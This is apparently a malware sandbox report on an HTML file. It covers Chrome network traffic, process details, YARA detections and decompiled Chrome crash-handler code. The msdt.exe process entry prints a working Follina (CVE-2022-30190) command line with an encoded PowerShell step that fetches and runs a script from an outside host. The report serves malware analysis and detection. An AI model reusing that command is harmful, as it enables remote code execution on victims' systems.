2022-06-03 09:10:17 UTC	0	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm X-Goog-Update-Updater: chromecrx-85.0.4183.121 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2022-06-03 09:10:17 UTC	2	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-m5MTDc_F5Y95pq1U1tnRJg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 03 Jun 2022 09:10:17 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 5632 X-Daystart: 7817 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2022-06-03 09:10:17 UTC	3	IN	Data Raw: 33 36 63 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 36 33 32 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 37 38 31 37 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 20 Data Ascii: 36c<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5632" elapsed_seconds="7817"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2022-06-03 09:10:17 UTC	4	IN	Data Raw: 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61 70 70 20 Data Ascii: kkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><app
2022-06-03 09:10:17 UTC	4	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 5208, Parent PID: 3368

General

Target ID:	0
Start time:	11:10:12
Start date:	03/06/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\1.html
Imagebase:	0x7ff7964c0000
File size:	2150896 bytes
MD5 hash:	C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4368, Parent PID: 5208

General

Target ID:	1
Start time:	11:10:14
Start date:	03/06/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
Imagebase:	0x7ff7964c0000
File size:	2150896 bytes
MD5 hash:	C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: msdt.exePID: 5808, Parent PID: 5208

General

Target ID:	12
Start time:	11:10:40
Start date:	03/06/2022
Path:	C:\Windows\System32\msdt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
Imagebase:	0x7ff689c20000
File size:	1560576 bytes
MD5 hash:	8BE43BAF1F37DA5AB31A53CA1C07EE0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 0000000C.00000002.666871221.000001DED42A4000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 0000000C.00000002.666068572.000001DED4010000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: elevation_service.exePID: 5240, Parent PID: 564

General

Target ID:	26
Start time:	11:11:46
Start date:	03/06/2022
Path:	C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
Imagebase:	0x7ff602ad0000
File size:	1322992 bytes
MD5 hash:	AFD137B53BA091ACBA569255B16DF837
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ChromeRecovery.exePID: 3328, Parent PID: 5240

General

Target ID:	27
Start time:	11:11:48
Start date:	03/06/2022
Path:	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system
Imagebase:	0x7ff7748d0000
File size:	259472 bytes
MD5 hash:	49AC3C96D270702A27B4895E4CE1F42A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Virustotal, Browse Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: ChromeRecovery.exePID: 3328, Parent PID: 5240COMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	27

Executed Functions

Function 00C7E00C Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 217
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00C7E00C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a40) {
				signed int _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				void* _v32;
				void* _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* __ebp;
				signed int _t75;
				void** _t85;
				_Unknown_base(*)()* _t87;
				void* _t96;
				struct HINSTANCE__* _t97;
				struct HINSTANCE__* _t98;
				intOrPtr* _t99;
				_Unknown_base(*)()* _t103;
				void* _t105;
				void* _t109;
				void* _t110;
				void* _t113;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t132;
				intOrPtr _t135;
				intOrPtr* _t139;
				intOrPtr _t140;
				struct _SECURITY_ATTRIBUTES* _t142;
				signed int _t143;
				struct _CRITICAL_SECTION** _t144;

				_t132 = __edx;
				_t75 =  *0xca8008; // 0x617e0cdd
				_v8 = _t75 ^ _t143;
				_v40 = _a4;
				_t113 = __ecx;
				_v36 = __ecx;
				_t135 = _a28;
				asm("lock xadd [0xca9e18], eax");
				_v44 = 2;
				_t142 = 0;
				 *((intOrPtr*)(__ecx + 8)) = _a16;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = E00C795BB;
				 *((intOrPtr*)(__ecx + 0x58)) = 0;
				 *((intOrPtr*)(__ecx + 0x5c)) = 0;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0;
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x6c)) = _a24;
				 *((intOrPtr*)(__ecx + 0x70)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 7;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x80)) = 0;
				 *((intOrPtr*)(__ecx + 0x84)) = 0;
				 *((intOrPtr*)(__ecx + 0x88)) = 0;
				 *((char*)(__ecx + 0x8c)) = 0;
				 *((intOrPtr*)(__ecx + 0xa8)) = 0;
				 *((intOrPtr*)(__ecx + 0xac)) = 0;
				 *((intOrPtr*)(__ecx + 0xb0)) = 0;
				 *((intOrPtr*)(__ecx + 0xb4)) = 0;
				 *((intOrPtr*)(__ecx + 0xb8)) = 0;
				 *((short*)(__ecx + 0xbc)) = 0;
				 *((char*)(__ecx + 0xbe)) = 0;
				_t145 = _t135;
				if(_t135 == 0) {
					L9:
					if( *((intOrPtr*)(_t113 + 0xc)) == 0) {
						_t41 = _t113 + 0x90; // 0x90
						InitializeCriticalSection(_t41);
						 *((intOrPtr*)(_t113 + 0xa8)) = CreateSemaphoreW(0, 0, 1, 0);
						_t96 = CreateSemaphoreW(0, 0, 1, 0);
						 *(_t113 + 0xac) = _t96;
						if(_t96 != 0 &&  *((intOrPtr*)(_t113 + 0xa8)) != 0) {
							_t105 = CreateThread(0, 0x10000, E00C7E48D, _t113, 0,  &_v48); // executed
							 *(_t113 + 0x88) = _t105;
						}
						_t97 = LoadLibraryW(L"dbghelp.dll"); // executed
						 *(_t113 + 0x64) = _t97;
						if(_t97 != 0) {
							_t103 = GetProcAddress(_t97, "MiniDumpWriteDump"); // executed
							 *(_t113 + 0x68) = _t103;
						}
						_t98 = LoadLibraryW(L"rpcrt4.dll");
						 *(_t113 + 0x70) = _t98;
						if(_t98 != 0) {
							 *((intOrPtr*)(_t113 + 0x74)) = GetProcAddress(_t98, "UuidCreate");
						}
						_t99 = _v40;
						_t52 = _t113 + 0x10; // 0x10
						_t139 = _t52;
						if(_t139 != _t99) {
							_t124 =  *((intOrPtr*)(_t99 + 0x10));
							if( *((intOrPtr*)(_t99 + 0x14)) >= 8) {
								_t99 =  *_t99;
							}
							E00C797AD(_t113, _t139, _t142, _t99, _t124);
						}
						if( *((intOrPtr*)(_t139 + 0x14)) >= 8) {
							_t139 =  *_t139;
						}
						 *((intOrPtr*)(_t113 + 0x58)) = _t139;
						E00C7EBE7(_t113, _t113, _t139, _t142); // executed
					}
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					E00C7ED25(_t113, _t132, _t142,  &_v28);
					if(_v44 == 1) {
						InitializeCriticalSection(0xca9e1c);
					}
					EnterCriticalSection(0xca9e1c);
					_t85 =  *0xca9e34; // 0x0
					_t161 = _t85;
					if(_t85 == 0) {
						_push(0xc);
						_t85 = E00C7F36C(_t161);
						 *0xca9e34 = _t85;
						 *_t85 = 0;
						_t85[1] = 0;
						_t85[2] = 0;
					}
					_t118 = _t85[1];
					_v32 = _t113;
					_t162 = _t85[2] - _t118;
					if(_t85[2] == _t118) {
						_t118 = _t85;
						E00C7EE84(_t113, _t85, 0, _t142, _t85,  &_v32);
					} else {
						 *_t118 = _t113;
						_t85[1] = _t85[1] + 4;
					}
					_t87 = SetUnhandledExceptionFilter(E00C7E588); // executed
					 *(_t113 + 0x7c) = _t87;
					 *((intOrPtr*)(_t113 + 0x80)) = E00C8349A(_t162, E00C7E634);
					 *_t144 = 0xc7e7b0;
					 *((intOrPtr*)(_t113 + 0x84)) = E00C82EAF(_t162);
					 *_t144 = 0xca9e1c;
					LeaveCriticalSection(??);
					if(_t142 != 0) {
						E00C7EDE9(_t142, _t118);
					}
					return E00C7F35B(_v8 ^ _t143);
				}
				_push(0x348);
				_t140 = E00C7EFB3(E00C7F36C(_t145), _t135, _t145, _t135,  *((intOrPtr*)(_t113 + 0x6c)), _a40);
				if(_t140 == 0) {
					goto L9;
				}
				_t142 = _t140;
				if( *((intOrPtr*)(_t140 + 0x28)) != 0) {
					L5:
					_t129 =  *((intOrPtr*)(_t113 + 0xc));
					_t142 = 0;
					if(_t140 != _t129) {
						if(_t129 != 0) {
							E00C7EDE9(_t129, _t129);
						}
						 *((intOrPtr*)(_t113 + 0xc)) = _t140;
					}
					goto L9;
				}
				_t109 = E00C7F00F(_t140); // executed
				_v32 = _t109;
				_t148 = _t109;
				if(_t109 == 0) {
					goto L9;
				}
				_t110 = E00C7F0AA(_t140, _t148, _t109);
				CloseHandle(_v32);
				_t113 = _v36;
				if(_t110 == 0) {
					goto L9;
				}
				goto L5;
			}

0x00c7e00c
0x00c7e012
0x00c7e019
0x00c7e020
0x00c7e023
0x00c7e028
0x00c7e02c
0x00c7e030
0x00c7e03b
0x00c7e041
0x00c7e043
0x00c7e049
0x00c7e04b
0x00c7e052
0x00c7e055
0x00c7e058
0x00c7e05b
0x00c7e05e
0x00c7e061
0x00c7e064
0x00c7e067
0x00c7e06a
0x00c7e071
0x00c7e074
0x00c7e07a
0x00c7e080
0x00c7e086
0x00c7e08c
0x00c7e092
0x00c7e098
0x00c7e09e
0x00c7e0a4
0x00c7e0aa
0x00c7e0b1
0x00c7e0b7
0x00c7e0b9
0x00c7e120
0x00c7e124
0x00c7e12a
0x00c7e131
0x00c7e146
0x00c7e153
0x00c7e155
0x00c7e15d
0x00c7e17a
0x00c7e180
0x00c7e180
0x00c7e18b
0x00c7e197
0x00c7e19c
0x00c7e1a4
0x00c7e1a6
0x00c7e1a6
0x00c7e1ae
0x00c7e1b4
0x00c7e1b9
0x00c7e1c3
0x00c7e1c3
0x00c7e1c6
0x00c7e1c9
0x00c7e1c9
0x00c7e1ce
0x00c7e1d4
0x00c7e1d7
0x00c7e1d9
0x00c7e1d9
0x00c7e1df
0x00c7e1df
0x00c7e1e8
0x00c7e1ea
0x00c7e1ea
0x00c7e1ee
0x00c7e1f1
0x00c7e1f1
0x00c7e201
0x00c7e205
0x00c7e208
0x00c7e20b
0x00c7e214
0x00c7e21b
0x00c7e21b
0x00c7e226
0x00c7e22c
0x00c7e231
0x00c7e233
0x00c7e235
0x00c7e237
0x00c7e23d
0x00c7e242
0x00c7e244
0x00c7e247
0x00c7e247
0x00c7e24a
0x00c7e24d
0x00c7e250
0x00c7e253
0x00c7e262
0x00c7e264
0x00c7e255
0x00c7e255
0x00c7e257
0x00c7e257
0x00c7e26e
0x00c7e279
0x00c7e281
0x00c7e287
0x00c7e293
0x00c7e299
0x00c7e2a0
0x00c7e2a8
0x00c7e2ad
0x00c7e2ad
0x00c7e2c0
0x00c7e2c0
0x00c7e0bb
0x00c7e0d4
0x00c7e0d8
0x00000000
0x00000000
0x00c7e0de
0x00c7e0e0
0x00c7e10a
0x00c7e10a
0x00c7e10d
0x00c7e111
0x00c7e115
0x00c7e118
0x00c7e118
0x00c7e11d
0x00c7e11d
0x00000000
0x00c7e111
0x00c7e0e4
0x00c7e0e9
0x00c7e0ec
0x00c7e0ee
0x00000000
0x00000000
0x00c7e0f3
0x00c7e0fd
0x00c7e105
0x00c7e108
0x00000000
0x00000000
0x00000000

APIs

CloseHandle.KERNEL32 ref: 00C7E0FD
InitializeCriticalSection.KERNEL32(00000090), ref: 00C7E131
CreateSemaphoreW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00C7E144
CreateSemaphoreW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00C7E153
CreateThread.KERNELBASE ref: 00C7E17A
LoadLibraryW.KERNELBASE ref: 00C7E18B
GetProcAddress.KERNELBASE ref: 00C7E1A4
LoadLibraryW.KERNEL32 ref: 00C7E1AE
GetProcAddress.KERNEL32 ref: 00C7E1C1
InitializeCriticalSection.KERNEL32(00CA9E1C,00000101), ref: 00C7E21B
EnterCriticalSection.KERNEL32(00CA9E1C,00000101), ref: 00C7E226
SetUnhandledExceptionFilter.KERNELBASE ref: 00C7E26E
LeaveCriticalSection.KERNEL32(00C7E634), ref: 00C7E2A0

Part of subcall function 00C7F0AA: GetCurrentProcessId.KERNEL32 ref: 00C7F0BB
Part of subcall function 00C7F0AA: TransactNamedPipe.KERNEL32(00000000,?,0000002C,?,0000002C,?,00000000), ref: 00C7F121
Part of subcall function 00C7F0AA: WriteFile.KERNEL32(00000000,?,0000002C,?,00000000), ref: 00C7F177

Strings

rpcrt4.dll, xrefs: 00C7E1A9
UuidCreate, xrefs: 00C7E1BB
dbghelp.dll, xrefs: 00C7E186
MiniDumpWriteDump, xrefs: 00C7E19E

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CriticalSection$Create$AddressInitializeLibraryLoadProcSemaphore$CloseCurrentEnterExceptionFileFilterHandleLeaveNamedPipeProcessThreadTransactUnhandledWrite
String ID: MiniDumpWriteDump$UuidCreate$dbghelp.dll$rpcrt4.dll
API String ID: 1170675889-801898421
Opcode ID: 5fef3b70586f854c02213516c3da9dcd240afff1e3bfc62f22baa1489cdc4467
Instruction ID: e6c0af23039b5b1dbaaf20eabd1d3f7223deea4d9dae047a281d07ea08050bd1
Opcode Fuzzy Hash: 5fef3b70586f854c02213516c3da9dcd240afff1e3bfc62f22baa1489cdc4467
Instruction Fuzzy Hash: 138136B1A052059FCB04DF689885BAEBBF9FF48300F0481BAE819DB256DB709941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E2C3 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00C7E2C3(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				long* _v8;
				signed int _t48;
				void* _t53;
				signed char _t60;
				long* _t62;
				long** _t78;
				long* _t92;
				void* _t96;
				long* _t100;
				long* _t102;
				void* _t103;

				_push(__ecx);
				_t96 = __ecx;
				if( *(__ecx + 0x64) != 0) {
					_t48 = FreeLibrary( *(__ecx + 0x64)); // executed
				}
				if( *(_t96 + 0x70) != 0) {
					_t48 = FreeLibrary( *(_t96 + 0x70));
				}
				_t100 = 0;
				if( *(_t96 + 0x78) != 0) {
					EnterCriticalSection(0xca9e1c);
					_t60 =  *(_t96 + 0x78);
					if((_t60 & 0x00000001) != 0) {
						SetUnhandledExceptionFilter( *(_t96 + 0x7c)); // executed
						_t60 =  *(_t96 + 0x78);
					}
					_t108 = _t60 & 0x00000002;
					if((_t60 & 0x00000002) != 0) {
						E00C8349A(_t108,  *((intOrPtr*)(_t96 + 0x80)));
						_t60 =  *(_t96 + 0x78);
					}
					_t109 = _t60 & 0x00000004;
					if((_t60 & 0x00000004) != 0) {
						E00C82EAF(_t109,  *((intOrPtr*)(_t96 + 0x84)));
					}
					_t78 =  *0xca9e34; // 0x0
					_t62 =  &(_t78[1][0xffffffffffffffff]);
					if( *_t62 != _t96) {
						_push("warning: removing Breakpad handler out of order\n");
						_push(E00C8B552(2));
						E00C7DF8C();
						_t78 =  *0xca9e34; // 0x0
						_t102 =  *_t78;
						__eflags = _t102 - _t78[1];
						if(_t102 != _t78[1]) {
							_t92 =  &(_t102[1]);
							_v8 = _t92;
							do {
								__eflags =  *_t102 - _t96;
								if( *_t102 != _t96) {
									_t102 =  &(_t102[1]);
									_t92 =  &(_t92[1]);
									__eflags = _t92;
									_v8 = _t92;
								} else {
									E00C80690(_t102, _t92, _t78[1] - _t92);
									_t92 = _v8;
									_t103 = _t103 + 0xc;
									_t78[1] =  &(_t78[1][0xffffffffffffffff]);
									_t78 =  *0xca9e34; // 0x0
								}
								__eflags = _t102 - _t78[1];
							} while (_t102 != _t78[1]);
						}
						_t100 = 0;
						__eflags = 0;
					} else {
						_t78[1] = _t62;
					}
					_t48 =  *_t78;
					if(_t48 == _t78[1]) {
						if(_t48 != 0) {
							E00C71D20(_t78, _t96,  *_t78, _t78[2] -  *_t78 & 0xfffffffc);
							 *_t78 = _t100;
							_t78[1] = _t100;
							_t78[2] = _t100;
						}
						_push(0xc);
						_t48 = E00C7F62D(_t78);
						 *0xca9e34 = _t100;
					}
					LeaveCriticalSection(0xca9e1c);
				}
				if( *((intOrPtr*)(_t96 + 0xc)) == _t100) {
					 *((char*)(_t96 + 0x8c)) = 1;
					ReleaseSemaphore( *(_t96 + 0xa8), 1, _t100);
					WaitForSingleObject( *(_t96 + 0x88), 0xea60);
					_t100 = CloseHandle; // executed
					FindCloseChangeNotification( *(_t96 + 0x88)); // executed
					 *(_t96 + 0x88) =  *(_t96 + 0x88) & 0x00000000;
					_t40 = _t96 + 0x90; // 0x191
					DeleteCriticalSection(_t40);
					CloseHandle( *(_t96 + 0xa8));
					_t48 = CloseHandle( *(_t96 + 0xac));
				}
				asm("lock xadd [0xca9e18], eax");
				if((_t48 | 0xffffffff) == 0) {
					DeleteCriticalSection(0xca9e1c);
				}
				_t43 = _t96 + 0xc0; // 0x1c1
				E00C7ED78(_t43, _t100);
				_t44 = _t96 + 0x40; // 0x141
				E00C79758(_t44);
				_t45 = _t96 + 0x28; // 0x129
				E00C79758(_t45);
				_t46 = _t96 + 0x10; // 0x111
				_t53 = E00C79758(_t46);
				_t84 =  *((intOrPtr*)(_t96 + 0xc));
				if( *((intOrPtr*)(_t96 + 0xc)) != 0) {
					return E00C7EDE9(_t84, _t84);
				}
				return _t53;
			}

0x00c7e2c6
0x00c7e2d0
0x00c7e2d6
0x00c7e2db
0x00c7e2db
0x00c7e2e1
0x00c7e2e6
0x00c7e2e6
0x00c7e2e8
0x00c7e2ed
0x00c7e2f8
0x00c7e2fe
0x00c7e303
0x00c7e308
0x00c7e30e
0x00c7e30e
0x00c7e311
0x00c7e313
0x00c7e31b
0x00c7e320
0x00c7e323
0x00c7e324
0x00c7e326
0x00c7e32e
0x00c7e333
0x00c7e334
0x00c7e33d
0x00c7e342
0x00c7e349
0x00c7e356
0x00c7e357
0x00c7e35c
0x00c7e364
0x00c7e366
0x00c7e369
0x00c7e36b
0x00c7e36e
0x00c7e371
0x00c7e371
0x00c7e373
0x00c7e394
0x00c7e397
0x00c7e397
0x00c7e39a
0x00c7e375
0x00c7e37d
0x00c7e382
0x00c7e385
0x00c7e388
0x00c7e38c
0x00c7e38c
0x00c7e39d
0x00c7e39d
0x00c7e371
0x00c7e3a2
0x00c7e3a2
0x00c7e344
0x00c7e344
0x00c7e344
0x00c7e3a4
0x00c7e3a9
0x00c7e3ad
0x00c7e3ba
0x00c7e3c1
0x00c7e3c3
0x00c7e3c6
0x00c7e3c6
0x00c7e3c9
0x00c7e3cc
0x00c7e3d3
0x00c7e3d3
0x00c7e3de
0x00c7e3de
0x00c7e3ed
0x00c7e3f8
0x00c7e3ff
0x00c7e410
0x00c7e41c
0x00c7e422
0x00c7e424
0x00c7e42b
0x00c7e432
0x00c7e43a
0x00c7e442
0x00c7e442
0x00c7e447
0x00c7e44f
0x00c7e456
0x00c7e456
0x00c7e458
0x00c7e45e
0x00c7e463
0x00c7e466
0x00c7e46b
0x00c7e46e
0x00c7e473
0x00c7e476
0x00c7e47b
0x00c7e483
0x00000000
0x00c7e486
0x00c7e48c

APIs

FreeLibrary.KERNELBASE ref: 00C7E2DB
FreeLibrary.KERNEL32 ref: 00C7E2E6
EnterCriticalSection.KERNEL32(00CA9E1C,00000101,?,?,00000101,?,00C794EA,?), ref: 00C7E2F8
SetUnhandledExceptionFilter.KERNELBASE ref: 00C7E308
LeaveCriticalSection.KERNEL32(00CA9E1C,?,00C794EA,?), ref: 00C7E3DE
ReleaseSemaphore.KERNEL32 ref: 00C7E3FF
WaitForSingleObject.KERNEL32 ref: 00C7E410
FindCloseChangeNotification.KERNELBASE(?), ref: 00C7E422
DeleteCriticalSection.KERNEL32(00000191), ref: 00C7E432
CloseHandle.KERNEL32 ref: 00C7E43A
CloseHandle.KERNEL32 ref: 00C7E442
DeleteCriticalSection.KERNEL32(00CA9E1C,00000101,?,?,00000101,?,00C794EA,?), ref: 00C7E456

Strings

warning: removing Breakpad handler out of order, xrefs: 00C7E349

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CriticalSection$Close$DeleteFreeHandleLibrary$ChangeEnterExceptionFilterFindLeaveNotificationObjectReleaseSemaphoreSingleUnhandledWait
String ID: warning: removing Breakpad handler out of order
API String ID: 209165198-3173292377
Opcode ID: bda738d08d25ebf255c20e25147d100da1a799ef9bf7d19cfe924acfd95ae72a
